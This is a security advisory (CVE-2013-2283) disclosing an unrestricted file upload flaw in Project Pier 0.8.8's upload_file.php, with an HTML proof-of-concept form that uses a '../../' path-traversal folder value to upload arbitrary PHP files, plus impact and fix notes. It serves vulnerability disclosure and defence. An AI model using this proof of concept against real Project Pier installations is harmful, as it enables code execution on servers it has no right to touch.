Vulnerabilities Disclosure

Remote Inclusion in Project Pier v 0.8.8

Dognædis Ref.: DGS-SEC-12

CVE Ref: CVE-2013-2283

Release Date: 2013/03/01

Discover Credits: CodeV - Code Analyzer

Bulletin Author(s): RVenancio - CodeV Team

Contact: irt@dognaedis.com

Type: Remote File Inclusion

Level: Very High (Low/High/Critical)

CVSS: 4.9 (Av:N/AC:L/Au:S/C:C/I:P/A:P)

Vulnerable Application: Project Pier v 0.8.8

Overview:
ProjectPier is a Free, Open-Source, PHP application for managing tasks, projects and teams through an intuitive web interface. It must be downloaded and installed on your own web server. ProjectPier will help your organization communicate, collaborate and get things done Its function is similar to commercial groupware/project management products, but allows the freedom and scalability of self-hosting

Scope:

File: /tools/upload_file.php Vulnerable Argument(s): $_FILES["file"]["name"]

Code:
line 20: move_uploaded_file($_FILES["file"]["tmp_name"])

Proof(s) of Concept:
<html>
<body>

<form action="http://localhost/pp088/tools/upload_file.php" method="post"
enctype="multipart/form-data">
<input type="hidden" value="../../prs" name="folder">
<input type="hidden" value="-99" name="part">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

</body>
</html>

Description:
This vulnerability allows an attacker to upload non expected content, for instance a php file, that will be executed while loading the file.

Impact:
Generally, by exploiting this kind of vulnerability, it might be possible to achieve possible attack vectors to various kinds of attacks such as:
- Code execution on the web server
- Code execution on the client
- Denial of Service

Resolution:
Validation of uploaded files by the user should not be made through the headers of the POST request, but by the contents itself.

Official Solution:
At the moment, there is no official solution for the reported vulnerabilities.

External References:
https://www.owasp.org/index.php/PHP_File_Inclusion
http://en.wikipedia.org/wiki/Remote_file_inclusion

Download the Vulnerability Report (PDF)

© Copyright 2015 CodeV